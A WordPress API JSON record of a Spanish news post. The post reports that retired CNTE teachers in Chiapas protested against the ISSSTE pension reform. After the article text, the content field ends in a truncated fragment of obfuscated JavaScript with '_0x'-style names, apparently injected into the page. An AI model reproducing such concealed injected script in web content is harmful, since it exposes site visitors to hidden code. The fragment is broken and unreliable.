{"id":20739,"date":"2025-03-05T04:53:40","date_gmt":"2025-03-05T04:53:40","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20739"},"modified":"2025-03-05T04:53:41","modified_gmt":"2025-03-05T04:53:41","slug":"jubilados-saldran-a-defender-sus-derechos-sindicales","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20739","title":{"rendered":"Jubilados saldr\u00e1n a defender sus derechos sindicales"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"765\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/FB_IMG_1741150261117-1024x765.jpg\" alt=\"\" class=\"wp-image-20740\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/FB_IMG_1741150261117-1024x765.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/FB_IMG_1741150261117-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/FB_IMG_1741150261117-768x574.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/FB_IMG_1741150261117.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>4 de marzo del 2025.Un grupo de docentes Jubilados pertenecientes a la Secci\u00f3n 7 de la Coordinadora Nacional de Trabajadores de la Educaci\u00f3n denominada &#8220;Hist\u00f3rica&#8221; realizaron un pronunciamiento en el Congreso del Estado a sumarse a las protestas contra la ley del ISSSTE que atenta contra la dignidad laboral<\/p>\n\n\n\n<p>Pedro De Le\u00f3n Ram\u00edrez coordinador estatal del Consejo Central de lucha de la CNTE dio a conocer que esta protesta es realizada para mostrar su respaldo y suma al magisterio de todo el pa\u00eds por este atropello.<\/p>\n\n\n\n<p>Dijo que tras la instalaci\u00f3n de la Ley de ISSSTE con la nueva tabla de edades oblig\u00e1ndolos a jubilarse bajo cuentas individuales dando paso a la iniciativa privada para manejar estos recursos y ahorros se ha generado una gran inconformidad.<\/p>\n\n\n\n<p>\u201cSe pretende agregar m\u00e1s cosas a esta ley, pro eso expresamos nuestro completo rechazo a la implementaci\u00f3n del descuento total del ISSSTE, es decir, cualquier concepto de prestaci\u00f3n o sueldo corriente ser\u00e1 sujeto de descuento total\u201d, se\u00f1al\u00f3.<\/p>\n\n\n\n<p>Dijo que actualmente los docentes activos y jubilados est\u00e1n padeciendo la falta de medicinas y servicios m\u00e9dicos de calidad.<br>\u201cA pesar de todo ello, nos quieren imponer nuevas cuotas a sabiendas que no tenemos un salario profesional, tal como lo hab\u00edan planteado las autoridades a\u00f1os atr\u00e1s\u201d, agreg\u00f3.<\/p>\n\n\n\n<p>El representante de los jubilados hizo el llamado a todos los maestros que cotizan en el ISSSTE para que se rechace tajantemente esta medida, esta Reforma de Ley.<\/p>\n\n\n\n<p>\u201cNo estamos de acuerdo a que se mida las pensiones en UMAS ya que se le hace un gran da\u00f1o a los salarios de los trabajadores de la educaci\u00f3n\u201d, coment\u00f3.<\/p>\n\n\n\n<p>Otro punto a considerar es el aumento de la edad para las jubilaciones, que afecta a todos los maestros, por ello el exhorto es a que se sumen a esta etapa de lucha que est\u00e1 a punto de comenzar.<\/p>\n\n\n\n<p>Dijo que, est\u00e1n dispuestos a continuar esta lucha hasta que el gobierno reconsidere esta nueva Reforma 2025 que pretende impulsar la federaci\u00f3n, la cual atenta contra los derechos laborales humanos y laborales del magisterio del pa\u00eds.<br>000000<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 4 de marzo del 2025.Un grupo de docentes Jubilados pertenecientes a la Secci\u00f3n 7 de la Coordinadora Nacional de Trabajadores de la Educaci\u00f3n denominada &#8220;Hist\u00f3rica&#8221; realizaron un pronunciamiento en el Congreso del Estado a sumarse a las protestas contra la ley del ISSSTE que atenta contra la dignidad laboral Pedro De Le\u00f3n Ram\u00edrez &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20740,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20739","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20739","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20739"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20739\/revisions"}],"predecessor-version":[{"id":20741,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20739\/revisions\/20741"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20740"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20739"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20739"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20739"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}